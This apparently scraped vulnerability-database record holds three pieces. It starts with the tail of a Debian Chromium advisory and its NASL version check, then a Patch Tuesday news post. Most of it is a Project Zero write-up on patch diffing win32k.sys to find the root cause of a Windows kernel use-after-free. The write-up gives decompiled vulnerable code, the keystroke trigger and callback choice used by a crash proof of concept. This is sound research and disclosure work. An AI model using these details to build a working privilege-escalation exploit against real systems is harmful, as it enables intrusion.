user interface error in full screen mode.\n\nCVE-2019-13661\nWenxu Wu discovered a user interface spoofing issue in full screen mode.\n\nCVE-2019-13662\nDavid Erceg discovered a way to bypass the Content Security Policy.\n\nCVE-2019-13663\nLnyas Zhang discovered a way to spoof Internationalized Domain Names.\n\nCVE-2019-13664\nThomas Shadwell discovered a way to bypass the SameSite cookie feature.\n\nCVE-2019-13665\nJun Kokatsu discovered a way to bypass the multiple file download\nprotection feature.\n\nCVE-2019-13666\nTom Van Goethem discovered an information leak.\n\nCVE-2019-13667\nKhalil Zhani discovered a URL spoofing issue.\n\nCVE-2019-13668\nDavid Erceg discovered an information leak.\n\nCVE-2019-13669\nKhalil Zhani discovered an authentication spoofing issue.\n\nCVE-2019-13670\nGuang Gong discovered a memory corruption issue in the v8 javascript\nlibrary.\n\nCVE-2019-13671\nxisigr discovered a user interface error.\n\nCVE-2019-13673\nDavid Erceg discovered an information leak.\n\nCVE-2019-13674\nKhalil Zhani discovered a way to spoof Internationalized Domain Names.\n\nCVE-2019-13675\nJun Kokatsu discovered a way to disable extensions.\n\nCVE-2019-13676\nWenxu Wu discovered an error in a certificate warning.\n\nCVE-2019-13677\nJun Kokatsu discovered an error in the chrome web store.\n\nCVE-2019-13678\nRonni Skansing discovered a spoofing issue in the download dialog window.\n\nCVE-2019-13679\nConrad Irwin discovered that user activation was not required for\nprinting.\n\nCVE-2019-13680\nThijs Alkamade discovered an IP address spoofing issue.\n\nCVE-2019-13681\nDavid Erceg discovered a way to bypass download restrictions.\n\nCVE-2019-13682\nJun Kokatsu discovered a way to bypass the site iso ...\n\n Description truncated. 
Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'chromium' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For the oldstable distribution (stretch), support for chromium has been\ndiscontinued. Please upgrade to the stable release (buster) to continue\nreceiving chromium updates or switch to firefox, which continues to be\nsupported in the oldstable release.\n\nFor the stable distribution (buster), these problems have been fixed in\nversion 78.0.3904.97-1~deb10u1.\n\nWe recommend that you upgrade your chromium packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"chromium\", ver:\"78.0.3904.97-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"chromium-common\", ver:\"78.0.3904.97-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"chromium-driver\", ver:\"78.0.3904.97-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"chromium-l10n\", ver:\"78.0.3904.97-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"chromium-sandbox\", ver:\"78.0.3904.97-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"chromium-shell\", ver:\"78.0.3904.97-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "krebs": [{"lastseen": "2019-11-15T18:21:02", "bulletinFamily": "blog", "cvelist": ["CVE-2019-13720", "CVE-2019-1429", "CVE-2019-1457"], "description": "**Microsoft** today released updates to plug security holes in its software, including patches to 
fix at least 74 weaknesses in various flavors of **Windows** and programs that run on top of it. The November updates include patches for a zero-day flaw in **Internet Explorer** that is currently being exploited in the wild, as well as a sneaky bug in certain versions of **Office for Mac** that bypasses security protections and was detailed publicly prior to today's patches.\n\nMore than a dozen of the flaws tackled in this month's release are rated \"critical,\" meaning they involve weaknesses that could be exploited to install malware without any action on the part of the user, except for perhaps browsing to a hacked or malicious Web site or opening a booby-trapped file attachment.\n\nPerhaps the most concerning of those critical holes is a zero-day flaw in Internet ~~Exploder~~ Explorer ([CVE-2019-1429](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1429>)) that has already seen active exploitation. Today's updates also address two other critical vulnerabilities in the same Windows component that handles various [scripting languages](<https://encyclopedia2.thefreedictionary.com/Microsoft+Script+Engine>).\n\nMicrosoft also fixed a flaw in Microsoft Office for Mac ([CVE-2019-1457](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1457>)) that could allow attackers to bypass security protections in some versions of the program.\n\nMacros are bits of computer code that can be embedded into Office files, and malicious macros are frequently used by malware purveyors to compromise Windows systems. Usually, this takes the form of a prompt urging the user to \"enable macros\" once they've opened a booby-trapped Office document delivered via email. 
Thus, Office has a feature called \"disable all macros without notification.\"\n\n\n\nBut Microsoft says all versions of Office still support an older type of macros that do not respect this setting, and can be used as [a vector for pushing malware](<https://krebsonsecurity.com/2019/02/payroll-provider-gives-extortionists-a-payday/>). **Will Dormann** of the [CERT/CC has reported](<https://kb.cert.org/vuls/id/125336/>) that Office 2016 and 2019 for Mac will fail to prompt the user before executing these older macro types if the \"Disable all macros without notification\" setting is used.\n\nOther Windows applications or components receiving patches for critical flaws today include Microsoft Exchange and Windows Media Player. In addition, Microsoft also patched nine vulnerabilities -- five of them critical -- in the **Windows Hyper-V**, an add-on to the **Windows Server OS** (and **Windows 10 Pro**) that allows users to create and run [virtual machines](<https://azure.microsoft.com/en-us/overview/what-is-a-virtual-machine/>) (other \"guest\" operating systems) from within Windows.\n\nAlthough **Adobe** typically issues patches for its **Flash Player** browser component on Patch Tuesday, this is the second month in a row that Adobe has not released any security updates for Flash. However, Adobe today did push security fixes for a variety of its creative software suites, including [Animate](<https://helpx.adobe.com/security/products/animate/apsb19-34.html>), [Illustrator](<https://helpx.adobe.com/security/products/illustrator/apsb19-36.html>), [Media Encoder](<https://helpx.adobe.com/security/products/media-encoder/apsb19-52.html>) and [Bridge](<https://helpx.adobe.com/security/products/bridge/apsb19-53.html>). 
Also, I neglected to note last month that Adobe released a critical update for **Acrobat/Reader** that [addressed at least 67 bugs](<https://helpx.adobe.com/security/products/acrobat/apsb19-49.html>), so if you've got either of these products installed, please be sure they're patched and up to date.\n\nFinally, **Google** recently fixed a zero-day flaw in its **Chrome** Web browser ([CVE-2019-13720](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>)). If you use Chrome and see an upward-facing arrow to the right of the address bar, you have an update pending; fully closing and restarting the browser should install any available updates.\n\nNow seems like a good time to remind all you **Windows 7** end users that Microsoft will cease shipping security updates after January 2020 (this end-of-life also affects Windows Server 2008 and 2008 R2). While businesses and other volume-license purchasers will [have the option to pay for further fixes](<https://techcommunity.microsoft.com/t5/Windows-IT-Pro-Blog/How-to-get-Extended-Security-Updates-for-eligible-Windows/ba-p/917807>) after that point, all other Windows 7 users who want to stick with Windows will need to consider migrating to **Windows 10** soon.\n\nStandard heads-up: Windows 10 likes to install patches all in one go and reboot your computer on its own schedule. Microsoft doesn\u2019t make it easy for Windows 10 users to change this setting, [but it is possible](<https://www.howtogeek.com/224471/how-to-prevent-windows-10-from-automatically-downloading-updates/>). For all other Windows OS users, if you\u2019d rather be alerted to new updates when they\u2019re available so you can choose when to install them, there\u2019s a setting for that in Windows Update. 
To get there, click the Windows key on your keyboard and type \u201cwindows update\u201d into the box that pops up.\n\nKeep in mind that while staying up-to-date on Windows patches is a good idea, it's important to make sure you're updating only after you\u2019ve backed up your important data and files. A reliable backup means you\u2019re probably not freaking out when the odd buggy patch causes problems booting the system. So do yourself a favor and back up your files before installing any patches.\n\nAs ever, if you experience glitches or problems installing any of these patches this month, please feel free to leave a comment about it below; there\u2019s a decent chance other readers have experienced the same and may even chime in here with some helpful tips.\n\n**Update, Nov. 13, 11:34 a.m.:** An earlier version of this story misstated some of the findings from CERT/CC, and misspelled the name of the researcher. The above post has been corrected.", "modified": "2019-11-12T22:04:32", "published": "2019-11-12T22:04:32", "id": "KREBS:F5ECCD2DD57FDBC0A6062FA0AB5371FB", "href": "https://krebsonsecurity.com/2019/11/patch-tuesday-november-2019-edition/", "type": "krebs", "title": "Patch Tuesday, November 2019 Edition", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "googleprojectzero": [{"lastseen": "2020-12-14T19:22:44", "bulletinFamily": "info", "cvelist": ["CVE-2016-7255", "CVE-2019-1362", "CVE-2019-13720", "CVE-2019-1433", "CVE-2019-1458", "CVE-2019-1468", "CVE-2019-3568"], "description": "Posted by Maddie Stone, Project Zero\n\n# INTRODUCTION\n\nI\u2019m really interested in 0-days exploited in the wild and what we, the security community, can learn about them to make 0-day hard. I explained some of Project Zero\u2019s ideas and goals around in-the-wild 0-days in a [November blog post](<https://googleprojectzero.blogspot.com/2019/11/bad-binder-android-in-wild-exploit.html>). 
\n\nOn December\u2019s Patch Tuesday, I was immediately intrigued by CVE-2019-1458, a Win32k Escalation of Privilege (EoP), said to be exploited in the wild and discovered by Anton Ivanov and Alexey Kulaev of Kaspersky Lab. Later that day, Kaspersky published a [blog post](<https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/>) on the exploit. The blog post included details about the exploit, but only included partial details on the vulnerability. My end goal was to do variant analysis on the vulnerability, but without full and accurate details about the vulnerability, I needed to do a root cause analysis first. I tried to get my hands on the exploit sample, but I wasn't able to source a copy.\n\nWithout the exploit, I had to use binary patch diffing in order to complete root cause analysis. Patch diffing is an often overlooked part of the perpetual vulnerability disclosure debate, as vulnerabilities become public knowledge as soon as a software update is released, not when they are announced in release notes. Skilled researchers can quickly determine the vulnerability that was fixed by comparing changes in the codebase between old and new versions. If the vulnerability is not publicly disclosed before or at the same time that the patch is released, then this could mean that the researchers who undertake the patch diffing effort could have more information than the defenders deploying the patches.\n\nWhile my patch diffing adventure did not turn out with me analyzing the bug I intended (more on that to come!), I do think my experience can provide us in the community with a data point. It\u2019s rarely possible to reference hard timelines for how quickly sophisticated individuals can do this type of patch-diffing work, so we can use this as a test. 
I acknowledge that I have significant experience in reverse engineering; however, I had no previous experience at all doing research on a Windows platform, and no knowledge of how the operating system worked. It took me three work weeks from setting up my first VM to having a working crash proof-of-concept for a vulnerability. This can be used as a data point (likely a high upper bound) for the amount of time it takes for individuals to understand a vulnerability via patch diffing and to create a working proof-of-concept crasher, since most individuals will have prior experience with Windows.\n\nBut as I alluded to above, it turns out I analyzed and wrote a crash POC for not CVE-2019-1458, but actually [CVE-2019-1433](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1433>). I wrote this whole blog post back in January, went through internal reviews, then sent the blog post to Microsoft to preview (we provide vendors with 24 hour previews of blog posts). That\u2019s when I learned I\u2019d analyzed CVE-2019-1433, not CVE-2019-1458. At the beginning of March, Piotr Florczyk published a [detailed root cause analysis and POC for the \u201creal\u201d CVE-2019-1458 bug](<https://github.com/piotrflorczyk/cve-2019-1458_POC>). With the \u201creal\u201d root cause analysis for CVE-2019-1458 now available, I decided that maybe this blog post could still be helpful to share what my process was to analyze Windows for the first time and where I went wrong.\n\nThis blog post will share my attempt to complete a root cause analysis of CVE-2019-1458 through binary patch diffing, from the perspective of someone doing research on Windows for the first time. This includes the process I used, a technical description of the \u201cwrong\u201d, but still quite interesting bug I analyzed, and some thoughts on what I learned through this work, such as where I went wrong. 
This includes the root cause analysis for CVE-2019-1433, which I originally thought was the vulnerability for the in-the-wild exploit. As far as I know, the vulnerability detailed in this blog post was not exploited in the wild.\n\n# MY PROCESS\n\nWhen the vulnerability was disclosed on December\u2019s Patch Tuesday, I was immediately interested in the vulnerability. As a part of my new role on Project Zero where I\u2019m leading efforts to study 0-days used in the wild, I was really interested in learning Windows. I had never done research on a Windows platform and didn\u2019t know anything about Windows programming or the kernel. This vulnerability seemed like a great opportunity to start since:\n\n 1. Complete details about the specific vulnerability weren't available,\n\n 2. It affected both Windows 7 and Windows 10, and\n\n 3. The vulnerability is in win32k which is a core component of the Windows kernel.\n\nI spent a few days trying to get a copy of the exploit, but wasn\u2019t able to. Therefore I decided that binary patch-diffing would be my best option for figuring out the vulnerability. I was very intrigued by this vulnerability because it affected Windows 10 in addition to Windows 7. However, James Forshaw advised me to patch diff the Windows 7 win32k.sys files rather than the Windows 10 versions. He suggested this for a few reasons:\n\n 1. The signal to noise ratio is going to be much higher for Windows 7 rather than Windows 10. This \u201cnoise\u201d includes things like [Control Flow Guard](<https://docs.microsoft.com/en-us/windows/win32/secbp/control-flow-guard>), more inline instrumentation calls, and \u201cweirder\u201d compiler settings. \n\n 2. On Windows 10, win32k is broken up into a few different files: win32k.sys, win32kfull.sys, win32kbase.sys, rather than a single monolithic file.\n\n 3. 
Kaspersky\u2019s blog post stated that not all Windows 10 builds were affected.\n\nI got to work creating a Windows 7 testing environment. I created a Windows 7 SP1 x64 VM and then started the long process of patching it up until September 2019 (the last available update prior to the December 2019 update where the vulnerability was supposedly fixed). This took about a day and a half as I worked to find the right order to apply the different updates.\n\nTurns out that me thinking that September 2019 was the last available update prior to December 2019 would be one of the biggest reasons that I patch-diffed the wrong bug. I thought that September 2019 was the latest because it was the only update shown to me, besides December 2019, when I clicked \u201cCheck for Updates\u201d within the VM. Because I was new to Windows, I didn\u2019t realize that not all updates may be listed in the Windows Update window or that updates could also be downloaded from the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Home.aspx>). When Microsoft told me that I had analyzed the wrong vulnerability, that\u2019s when I realized my mistake. CVE-2019-1433, the vulnerability I analyzed, was patched in November 2019, not December 2019. If I had patch-diffed November to December, rather than September to December, I wouldn\u2019t have gotten mixed up.\n\nOnce the Windows 7 VM had been updated to Sept 2019, I made a copy of its C:\\Windows\\System32\\win32k.sys file and snapshotted the VM. I then updated it to the most recent patch, December 2019, where the vulnerability in question was fixed. I then snapshotted the VM again and saved off the copy of win32k.sys. These two copies of win32k.sys are the two files I diffed in my patch diffing analysis.\n\nWin32k is a core kernel driver that is responsible for the windows that are shown as a part of the GUI. 
In later versions of Windows, it\u2019s broken up into multiple files rather than the single file that it is on Windows 7. Having only previously worked on the Linux/Android and RTOS kernels, the GUI aspects took a little bit of time to wrap my head around.\n\nOn James Forshaw\u2019s recommendation, I cloned my VM so that one VM would run [WinDbg](<https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/getting-started-with-windbg--kernel-mode->) and debug the other VM. This allows for kernel debugging.\n\nNow that I had a copy of the supposedly patched and supposedly vulnerable versions of win32k.sys, it\u2019s time to start patch diffing.\n\n## PATCH DIFFING WINDOWS 7 WIN32K.SYS\n\nI decided to use BinDiff to patch diff the two versions of win32k. In October 2019, I did a comparison on the different binary diffing tools available [[video](<https://thecyberwire.com/stories/Maddie-Stone-Whatsup-with-WhatsApp-A-Detailed-Walk-Through-of-Reverse-Engineering-CVE-2019-3568.html>), [slides](<https://github.com/maddiestone/ConPresentations/raw/master/Jailbreak2019.WhatsUpWithWhatsApp.pdf>)], and for me, BinDiff worked best \u201cout of the box\u201d so I decided to at least start with that again.\n\nI loaded both files into IDA and then ran BinDiff between the two versions of win32k. To my pleasant surprise, there were only 23 functions total in the whole file/driver that had changed from one version to another. In addition, there were only two new functions added in the December 2019 file that didn\u2019t exist in September. This felt like a good sign: 23 functions seemed like even in the worst case, I could look at all of them to try and find the patched vulnerability. 
(Between the November and December 2019 updates only 5 functions had changed, which suggests the diffing process could have been even faster.)\n\n[](<https://1.bp.blogspot.com/-aVhnHuLjSCo/XoYOV0ev26I/AAAAAAAAPbw/atN5FMEnaS0CkZghfKU1LjoNB1ot9LoggCNcBGAsYHQ/s1600/1_Bindiff-noSymbols.png>)\n\nOriginal BinDiff Matched Functions of win32k.sys without Symbols\n\nWhen I started the diff, I didn\u2019t realize that the Microsoft Symbol Server was a thing that existed. I learned about the Symbol Server and was told that I could easily get the symbols for a file by running the following command in WinDbg: x win32k!*. I still hadn\u2019t realized that IDA Pro had the capability to automatically get the symbols for you from a PDB file, even if you aren\u2019t running IDA on a Windows computer. So after running the WinDBG command, I copied all of the output to a file, rebased my IDA Pro databases to the same base address and then would manually rename functions as I was reversing based on the symbols and addresses in the text file. About a week into this escapade, I learned how to modify the IDA configuration file to have my IDA Pro instance, running on Linux, connect to my Windows VM to get the symbols.\n\n[](<https://1.bp.blogspot.com/-GW0vp_mg4m0/Xpto5bZmk8I/AAAAAAAAPhs/9tdNfmFEo7oux9cM1WD1df0BNg_P7hG8gCNcBGAsYHQ/s1600/2_Bindiff-Symbols%2B%25281%2529.png>)\n\nBinDiff Matched Function of win32k.sys with Symbols\n\nWhat stood out at first when I looked at BinDiff was that none of the functions called out in Kaspersky\u2019s blog post had been changed: not DrawSwitchWndHilite, CreateBitmap, SetBitmapBits, nor NtUserMessageCall. Since I didn\u2019t have a strong indicator for a starting point, I instead tried to rule out functions that likely wouldn\u2019t be the change that I was looking for. I first searched for function names to determine if they were a part of a different blog post or CVE. 
Then I looked through all of the CVEs claimed to affect Windows 7 that were fixed in the December Bulletin and matched them up. Through this I ruled out the following functions:\n\n * CreateSurfacePal \\- [CVE-2019-1362](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1362>)\n\n * RFONTOBJ::bInsterGlyphbitsLookaside, xInsertGlyphbitsRFONTOBJ \\- [CVE-2019-1468](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1468>)\n\n## EXPLORING THE WRONG CHANGES\n\nAt this point I started scanning through functions to try and understand their purpose and look at the changes that were made. GreGetStringBitmapW caught my eye because it had \u201cbitmap\u201d in the name and Kaspersky\u2019s blog post talked about the use of bitmaps.\n\nThe changes to GreGetStringBitmapW didn\u2019t raise any flags: one of the changes had no functional impact and the other was sending arguments to another function, a function that was also listed as having changed in this update. This function had no public symbols available and is labeled as vuln_sub_FFFFF9600028F200 in the Bindiff image above. In the Dec 2019 win32k.sys its offset from base address is 0x22F200.\n\n[](<https://1.bp.blogspot.com/-SliC7FMJvbA/Xpto5X5btDI/AAAAAAAAPhk/2_35zFpN7AMMbQCMSEzrikeN2bZpmc4ewCNcBGAsYHQ/s1600/3_Bindiff%2Bfor%2Bvuln%2Bfunction%2B%25281%2529.png>)\n\nAs shown by the BinDiff flow graph above, there is a new block of code added in the Dec 2019 version of win32k.sys. The Dec 2019 version added argument checking before using that argument when calculating where to write to a buffer. This made me think that this was a vulnerability in contention: it\u2019s called from a function with bitmap in the name and appears that there would be a way to overrun a buffer.\n\nI decided to keep reversing and spent a few days on this change. 
I was getting deep down in the rabbit hole though and had to remember that the only tie I had between this function and the details known about the in-the-wild exploit was that \u201cbitmap\u201d was in the name. I needed to determine if this function was even called during the calls mentioned in the Kaspersky blog post. I followed cross-references to determine how this function could be called.\n\n[](<https://1.bp.blogspot.com/-mB6GU5FDVxc/Xpto5V4kkFI/AAAAAAAAPho/W7W9o3LFX2oM2PTjgcsPXBeAEJ05JY17wCNcBGAsYHQ/s1600/4_Call%2Bgraph%2Bto%2Bvuln_sub%2B%25281%2529.png>)\n\nThe Nt prefix on function names means that the function is a syscall. The Gdi in NtGdiGetStringBitmapW means that the user-mode call is in gdi32.dll. Mateusz Jurczyk provides a table of Windows syscalls [here](<https://j00ru.vexillium.org/syscalls/win32k/64/>). Therefore, the only way to trigger this function is through a syscall to NtGdiGetStringBitmapW. In gdi32.dll, the only call to NtGdiGetStringBitmapW is GetStringBitmapA, which is exported.\n\nTracing this call path and realizing that none of the functions mentioned in the Kaspersky blog post called this function made me realize that it was pretty unlikely that this was the vulnerability. However, I decided to dynamically double check that this function wouldn\u2019t be called when calling the functions listed in the blog post or trigger the task switch window.\n\nI downloaded Visual Studio into my Windows 7 VM and wrote my first Windows Desktop app, following [this guide](<https://docs.microsoft.com/en-us/cpp/windows/walkthrough-creating-windows-desktop-applications-cpp?view=vs-2019>). Once I had a working \u201cHello, World\u201d, I began to add calls to the functions that are mentioned in the Kaspersky blog post: Creating the \u201cSwitch\u201d window, CreateBitmap, SetBitmapBits, NtUserMessageCall, and half-manually/half-programmatically trigger the task-switch window, etc. 
I set a kernel breakpoint in Windbg on the function of interest and then ran all of these. The function was never triggered, confirming that it was very unlikely this was the vulnerability of interest.\n\nI then moved on to GreAnimatePalette. When you trigger the task switch window, it draws a new window onto the screen and moves the \u201chighlight\u201d to the different windows each time you press tab. I thought that, \u201cSure, that could involve animating a palette\u201d, but I learned from last time and started with trying to trigger the call in WinDbg instead. I found that it was never called in the methods that I was looking at so I didn\u2019t spend too long and moved on.\n\n## NARROWING IT DOWN TO xxxNextWindow and xxxKeyEvent\n\nAfter these couple of false starts, I decided to change my process. Instead of starting with the functions in the diff, I decided to start at the function named in Kaspersky\u2019s blog: DrawSwitchWndHilite. I searched the cross-references graph to DrawSwitchWndHilite for any functions listed in the diff as having been changed.\n\n[](<https://1.bp.blogspot.com/-feXJTEAgl44/Xpto6OfKniI/AAAAAAAAPhw/jYsbKf5Cbf4f2pMxfw4p84PjMYyoaVmrACNcBGAsYHQ/s1600/5_Cross-refs%2Bto%2BDrawSwitchWndHilite%2B%25281%2529.png>)\n\nAs shown in the call graph above, xxxNextWindow is two calls above DrawSwitchWndHilite. When I looked at xxxNextWindow, I then saw that xxxNextWindow is only called by xxxKeyEvent and all of the changes in xxxKeyEvent surrounded the call to xxxNextWindow. These appeared to be the only functions in the diff that led to a call to DrawSwitchWndHilite so I started reversing to understand the changes.\n\n## REVERSING THE VULNERABILITY\n\nI had gotten symbols for the function names in my IDA databases, but for the vast majority of functions, this didn\u2019t include type information. To begin finding type information, I started googling for different function names or variable names. 
While it didn't have everything, ReactOS was one of the best resources for finding type information, and most of the structures were already in IDA.

For example, when looking at xxxKeyEvent, I saw that in one case, the first argument to xxxNextWindow is gpqForeground. When I googled for gpqForeground, ReactOS showed me that this variable has type tagQ *. Through this, I also realized that Windows uses a convention for naming variables where the type is abbreviated at the beginning of the name. For example: gpqForeground → global, pointer to queue (tagQ *), gptiCurrent → global, pointer to thread info (tagTHREADINFO *).

This was important for the modification to xxxNextWindow. There was a single line change between September and December to xxxNextWindow. The change checked a single bit in the structure pointed to by arg1. If that bit is set, the function will exit in the December version. If it's not set, then the function proceeds, using arg1. Once I knew that the type of the first argument was tagQ *, I used WinDbg and/or IDA to see its structure. The command in WinDbg is dt win32k!tagQ.

At this point, I was pretty sure I had found the vulnerability (😉), but I needed to prove it. This involved about a week more of reversing, reading, debugging, wanting to throw my computer out the window, and getting intrigued by potential vulnerabilities that were not this vulnerability.
As a side note, for the reversing, I found that the HexRays decompiler was great for general triage and understanding large blocks of code, but for the detailed understanding necessary (at least for me) for writing a proof-of-concept (POC), I mainly used the disassembly view.

## RESOURCES

Here are some of the resources that were critical for me:

 * "Kernel Attacks Through User-Mode Callbacks" Blackhat USA 2011 talk by Tarjei Mandt [[slides](<http://mista.nu/research/mandt-win32k-slides.pdf>), video]
   * I learned about thread locking, assignment locking, and user-mode callbacks.
 * "One Bit To Rule A System: Analyzing CVE-2016-7255 Exploit In The Wild" by Jack Tang, Trend Micro Security Intelligence [[blog](<https://blog.trendmicro.com/trendlabs-security-intelligence/one-bit-rule-system-analyzing-cve-2016-7255-exploit-wild/>)]
   * This was an analysis of a vulnerability also related to xxxNextWindow. This blog helped me ultimately figure out how to trigger xxxNextWindow and some argument types of other functions.
 * "Kernel exploitation – r0 to r3 transitions via KeUserModeCallback" by Mateusz Jurczyk [[blog](<https://j00ru.vexillium.org/2010/09/kernel-exploitation-r0-to-r3-transitions-via-keusermodecallback/>)]
   * This blog helped me figure out how to modify the dispatch table pointer with my own function so that I could execute during the user-mode callback.
 * "Windows Kernel Reference Count Vulnerabilities - Case Study" by Mateusz Jurczyk, Zero Nights 2012 [[slides](<https://j00ru.vexillium.org/slides/2012/zeronights.pdf>)]
 * "Analyzing local privilege escalations in win32k" by mxatone, Uninformed v10 (10/2008) [[article](<http://uninformed.org/?v=10&a=2>)]
 * P0 Team Members: James Forshaw, Tavis Ormandy, Mateusz Jurczyk, and Ben Hawkes

# TIMELINE

 * Oct 31 2019: Chrome releases fix for CVE-2019-13720
 * Dec 10 2019: Microsoft Security Bulletin lists CVE-2019-1458
as exploited in the wild and fixed in the December updates.
 * Dec 10-16 2019: I ask around for a copy of the exploit. No luck!
 * Dec 16 2019: I begin setting up a Windows 7 kernel debugging environment. (And 2 days work on a different project.)
 * Dec 23 2019: VM is set up. Start patch diffing
 * Dec 24-Jan 2: Holiday
 * Jan 2 - Jan 3: Look at other diffs that weren't the vulnerability. Try to trigger DrawSwitchWndHilite
 * Jan 6: Realize changes to xxxKeyEvent and xxxNextWindow are the correct change. (Note dear reader, this is not in fact the "correct change".)
 * Jan 6-Jan 16: Figure out how the vulnerability works, go down random rabbit holes, work on POC.
 * Jan 16: Crash POC crashes!

Approximately 3 work weeks to set up a test environment, diff patches, and create crash POC.

# CVE-2019-1458 CVE-2019-1433 ROOT CAUSE ANALYSIS

Bug class: use-after-free

## OVERVIEW

The vulnerability is a use-after-free of a tagQ object in xxxNextWindow, freed during a user-mode callback. (The xxx prefix on xxxNextWindow means that there is a callback to user mode.) The function xxxKeyEvent is the only function that calls xxxNextWindow and it calls xxxNextWindow with a pointer to a tagQ object as the first argument. Neither xxxKeyEvent nor xxxNextWindow lock the object to prevent it from being freed during any of the user-mode callbacks in xxxNextWindow. After one of these user-mode callbacks (xxxMoveSwitchWndHilite), xxxNextWindow then uses the pointer to the tagQ object without any verification, causing a use-after-free.

## DETAILED WALK THROUGH

This section will walk through the vulnerability on Windows 7. I analyzed the Windows 7 patches instead of Windows 10 as explained above in the process section.
The Windows 7 crash POC that I developed is available [here](<https://drive.google.com/file/d/1V9HHljjRq17hnfqasExnCiGCJLkt0aOX/view>).

### ANALYZED SAMPLES

I did the diff and analysis between the September and December 2019 updates of win32k.sys as explained in the "My Process" section.

Vulnerable win32k.sys (Sept 2019): 9dafa6efd8c2cfd09b22b5ba2f620fe87e491a698df51dbb18c1343eaac73bcf (SHA-256)

Patched win32k.sys (December 2019): b22186945a89967b3c9f1000ac16a472a2f902b84154f4c5028a208c9ef6e102 (SHA-256)

### OVERVIEW

This walk through is broken up into the following sections to describe the vulnerability:

 * Triggering xxxNextWindow
 * Freeing the tagQ (queue) structure
 * User-mode callback xxxMoveSwitchWndHilite
 * Using the freed queue

### TRIGGERING xxxNextWindow

The code path is triggered by a special set of keyboard inputs to open a "Sticky Task Switcher" window. As a side note, I didn't find a way to manually trigger the code path, only programmatically (not that an individual writing an EoP would need it to be triggered manually). To trigger xxxNextWindow, my proof-of-concept (POC) sends the following keystrokes using the SendInput API:

<ALT (Extended)> + TAB + TAB release + ALT + CTRL + TAB + release all except ALT extended + TAB. (See the triggerNextWindow function in the POC.)

The "normal" way to trigger the task switch window is with ALT + TAB, or ALT+CTRL+TAB for "sticky". However, this window won't hit the vulnerable code path, xxxNextWindow. The "normal" task switching window, shown below, looks different from the task switching window displayed when the vulnerable code path is being executed. Shown below is the "normal" task switch window that is displayed when ALT+TAB [+CTRL] are pressed and xxxNextWindow is NOT triggered. The window that is shown when xxxNextWindow is triggered is shown below that.

[Figure: "Normal" task switch window]

[Figure: Window that is displayed when xxxNextWindow is called]

If this is the first "tab press" then the task switch window needs to be drawn on the screen. This code path through xxxNextWindow is not the vulnerable one. The next time you hit TAB, after the window has already been drawn on the screen, when the rectangle should move to the next window, is when the vulnerable code in xxxNextWindow can be reached.

### FREEING THE QUEUE in xxxNextWindow

xxxNextWindow takes a pointer to a queue (tagQ struct) as its first argument. This tagQ structure is the object that we will use after it is freed. We will free the queue in a user-mode callback from the function.

At LABEL_106 below (xxxNextWindow+0x847), the queue is used without verifying whether or not it still exists. The only way to reach LABEL_106 in xxxNextWindow is from the branch at xxxNextWindow+0x842. This means that our only option for a user-mode callback is in the function xxxMoveSwitchWndHilite. xxxMoveSwitchWndHilite is responsible for moving the little box within the task switch window that highlights the next window.

```c
void __fastcall xxxNextWindow(tagQ *queue, int a2) {
[...]

v43 = 0;
while ( 1 ) {
    if (gspwndAltTab->fnid & 0x3FFF == 0x2A0 &&
        gspwndAltTab->cbwndExtra + 0x128 == gpsi->mpFnid_serverCBWndProc[6] &&
        gspwndAltTab->bDestroyed == 0 )
        v45 = *(switchWndStruct **)(gspwndAltTab + 0x128);
    else
        v45 = 0i64;
    if ( !v45 ) {
        ThreadUnlock1();
        goto LABEL_106;
    }
    handleOfNextWindowToHilite = xxxMoveSwitchWndHilite(v8, v45, isShiftPressed2); // <-- USER MODE CALLBACK
    if ( v43 )
    {
        if ( v43 == handleOfNextWindowToHilite ) {
            v48 = 0i64;
LABEL_103:
            ThreadUnlock1();
            HMAssignmentLock(&gspwndActivate, v48);
            if ( !*(_QWORD *)&gspwndActivate )
                xxxCancelCoolSwitch();
            return;
        }
    } else { v43 = handleOfNextWindowToHilite; }
    tagWndPtrOfNextWindow = HMValidateHandleNoSecure(handleOfNextWindowToHilite, TYPE_WINDOW);
    if ( tagWndPtrOfNextWindow )
        goto LABEL_103;
    isShiftPressed2 = isShiftPressed;
}

[...]

LABEL_106:
v11 = queue->spwndActive; // <-- USE AFTER FREE
if ( v11 || (v11 = queue->ptiKeyboard->rpdesk->pDeskInfo->spwnd->spwndChild) != 0i64 ) {

[...]
```

### USER-MODE CALLBACK in xxxMoveSwitchWndHilite

There are quite a few different user-mode callbacks within xxxMoveSwitchWndHilite. Many of these could work, but the difficulty is picking one that will reliably return to our POC code. I chose the call to xxxSendMessageTimeout in DrawSwitchWndHilite.

